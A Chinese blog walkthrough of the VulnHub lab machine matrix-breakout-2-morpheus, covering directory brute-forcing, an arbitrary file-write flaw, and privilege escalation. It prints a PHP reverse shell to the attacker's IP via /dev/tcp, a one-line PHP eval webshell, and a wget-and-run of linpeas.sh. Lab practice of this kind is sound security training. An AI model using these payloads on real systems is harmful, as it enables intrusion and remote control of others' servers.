vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
2024-10-21 05:03:01
vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。
靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
网络模式:桥接。
一:信息收集
2;访问端口信息。三位一体不会玩。
3;目录爆破一下,继续寻找。
4;文件爆破一下,
ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。
二:漏洞利用。
1;burp抓包看一下数据包,
这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>
2;监听成功。
3;发现一个txt的文件。提示,和一张图片。
www-data@morpheus:/$ ls -al
要找到cypher的密码!!
4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。
复制不了的,也可以下载。
wget http://192.168.1.35/.cypher-neo.png
binwalk -w cypher-neo.png
binwalk -e cypher-neo.png --run-as=root
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,
zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
5:传信息收集的工具上去,
python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
到这的话我们就提权成功了。前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。
python3 -c 'import pty; pty.spawn("/bin/bash")' 把权限变成交互式shell。
没爆破出来!
也可以写个马,连接蚁剑看看文件里面有没有什么信息。
<?php eval(@$_POST['password']);?>
四:总结
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。
2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。
3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。
最新文章
- 使用subclass UIActivity的方案来分享图片
- 利用nginx向现有网站添加登录验证功能(不添加修改现有网站代码)
- Webdriver - Selenium Grid Configuration
- Git-Flow
- 【入门篇】Nginx + FastCGI 程序(C/C++) 搭建高性能web service的Demo及部署发布
- monkeyrunner工具同Monkey工具的差别
- HTML&;CSS基础学习笔记1.6-html的文本操作标签
- 09应用输入经理旋转场景--《猿学校课程Unity3d》
- CentOs Linux 文件位置标记
- UIButton 解析
- linux_文件类型
- wpf研究之道-grid控件
- 011 Socket定义客户端
- windows下复制文件报错“文件名对目标文件夹可能过长 。您可以缩短文件名并重试,或者......”
- Linux (Redhat / Fedora / CentOS) 更改 hostname 的方式
- Maven目标
- oracle delete t1;drop table t1;drop table t1 purge
- C#设计模式系列:适配器模式(Adapter Pattern)
- 第一次写C语言小程序,可以初步理解学生成绩管理系统的概念
- Swift_字典详解